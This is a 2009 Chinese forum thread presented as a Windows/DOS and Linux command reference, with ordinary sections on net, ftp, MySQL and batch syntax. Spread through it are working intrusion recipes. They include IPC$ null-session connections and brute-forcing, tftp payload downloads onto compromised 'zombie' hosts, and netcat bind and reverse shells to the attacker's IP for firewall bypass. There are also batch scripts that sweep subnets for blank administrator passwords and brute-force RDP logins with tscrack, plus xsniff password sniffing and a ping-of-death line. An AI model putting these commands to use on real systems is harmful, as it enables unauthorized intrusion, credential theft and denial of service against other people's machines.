[ZLG-ARM] DOS命令

楼主(2009-04-06):
dos, TE, ST, se, ip
net use ipipc$ " " /user:" " 建立IPC空链接
net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: ipc$ 登陆后映射对方C:到本地为H:
net use ipipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名  开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time 目标ip 查看对方时间
net time 目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net **ff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:"-w数字"用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:"-l[空格]数据包大小";"-n发送数据次数";"-t"指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数"/all"显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如"DEL/AR *.*"表示删除当前目录下所有只读文件,"DEL/A-S *.*"表示删除当前目录下除系统文件以外的所有文件

#2 二:

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a  将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将"IP"的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即"DATE/T"、"TIME/T"将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:":start"标签)
call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )

#3 三:

ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:        est.txt /D pub 设定d:        est.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况

#4 四:

IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip

#5 五:

MYSQL 命令:
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql;
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
win2003系统下新增命令(实用部份):
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。

#6 六:

Linux系统下基本命令: 要区分大小写
uname 显示版本信息(同win2K的 ver)
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
pwd 查询当前所在的目录位置
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
cat 文件名 查看文件内容
cat >abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件,rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
ftp ftp连接上某服务器(同win2K)

附:批处理命令与变量

1:for命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;"(1 -1 254)"说明:即从254到1 }

command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开
command_parameters:为特定命令指定参数或命令行开关

IN (set):指在(set)中取值;DO command :指执行command

参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:pass.txt)时 }。
用法举例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。

/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
存为:ok.exe 说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。

#7 七:

2:if命令及变量 基本格式:
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为"真"。
例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
0 指发现并成功执行(真);1 指没有发现、没执行(假)。
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。
例:"if "%2%"=="4" goto start"指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。
例:"if not nc.exe goto end"指:如果没有发现nc.exe文件就跳到":end"标签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:"if exist test.txt. else echo test.txt.missing ",注意命令中的"."

(二)系统外部命令(均需下载相关工具):

1、瑞士军刀:nc.exe

参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行[危险]
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt
nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc -l -p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称
在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
备 注:
| 管道命令
< 或 > 重定向命令。"<",例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中
>与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。
如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。

#8 八:

2、扫锚工具:xscan.exe

基本格式
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
  -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测"hostlist.txt"文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机

#9 九:

3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出

4、终端服务密码**: tscrack.exe

参数说明
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接(多线程)
-N Prevent System Log entries on targeted server
-U 卸载移除tscrack组件
-f 使用-f后面的密码
-F 间隔时间(频率)
-l 使用-l后面的用户名
-w 使用-w后面的密码字典
-p 使用-p后面的密码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码
tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)
3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了)
hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将**结果保存在rouji.txt文件中。

5、其它:

Shutdown.exe
Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)
fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息
Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。
OpenTelnet.exe (远程开启telnet工具)
opentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。
NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。

ResumeTelnet.exe (OpenTelnet附带的另一个工具)
resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。

#10 十:

6、FTP命令详解:

FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。

FTP的命令行格式为:
ftp -v -d -i -n -g [主机名] ,其中

-v 显示远程服务器的所有响应信息;

-n 限制ftp的自动登录,即不使用;.n etrc文件;

-d 使用调试方式;

-g 取消全局文件名。

FTP使用的内部命令如下(中括号表示可选项):

2.$ macro-ame[args]: 执行宏定义macro-name。

3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。
4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。

5.ascii:使用ascii类型传输方式。
6.bell:每个命令执行完毕后计算机响铃一次。

7.bin:使用二进制文件传输方式。
8.bye:退出ftp会话过程。

9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。
10.cd remote-dir:进入远程主机目录。

11.cdup:进入远程主机目录的父目录。
12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。

13.close:中断与远程服务器的ftp会话(与open对应)。
14.cr:使用asscii方式传输文件时,将回车换行转换为回行。

15.delete remote-file:删除远程主机文件。
16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。

17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件。
18.disconnection:同close。

19.form. format:将文件传输方式设置为format,缺省为file方式。
20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。

21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
22.hash:每传输1024字节,显示一个hash符号(#)。

23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。
24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。

25.image:设置二进制传输方式(同binary)。
26.lcd[dir]:将本地工作目录切换至dir。

27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。
28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。

29.mdelete[remote-file]:删除远程主机文件。
30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。

31.mget remote-files:传输多个远程文件。
32.mkdir dir-name:在远程主机中建一目录。

33.mls remote-file local-file:同nlist,但可指定多个文件名。
34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。

35.modtime file-name:显示远程主机文件的最后修改时间。
36.mput local-file:将多个文件传输至远程主机。

37.newer file-name: 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。

39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。 该命令特别适用于远程主机为非UNIX机的情况。
40.ntrans[inchars][outchars]]:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。

41.open host[port]:建立指定ftp服务器连接,可指定连接端口。
42.passive:进入被动传输方式。

43.prompt:设置多个文件传输时的交互提示。
44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。
45.put local-file[remote-file]:将本地文件local-file传送至远程主机。
46.pwd:显示远程主机的当前工作目录。

47.quit:同bye,退出ftp会话。
48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.

49.recv remote-file[local-file]:同get。
50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。

51.rhelp[cmd-name]:请求获得远程主机的帮助。
52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。

53.rename[from][to]:更改远程主机文件名。
54.reset:清除回答队列。

55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。
56.rmdir dir-name:删除远程主机目录。

57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。
58.send local-file[remote-file]:同put。

59.sendport:设置PORT命令的使用。
60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。

61.size file-name:显示远程主机文件大小,如:site idle 7200。
62.status:显示当前ftp状态。

63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。
64.sunique:将远程主机文件名存储设置为只一(与runique对应)。

65.system:显示远程主机的操作系统类型。
66.tenex:将文件传输类型设置为TENEX机的所需的类型。

67.tick:设置传输时的字节计数器。
68.trace:设置包跟踪。

69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。
70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3

71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。
72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on.

73.?[cmd]:同help.

#11 十一:

7:计算机运行命令全集 winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
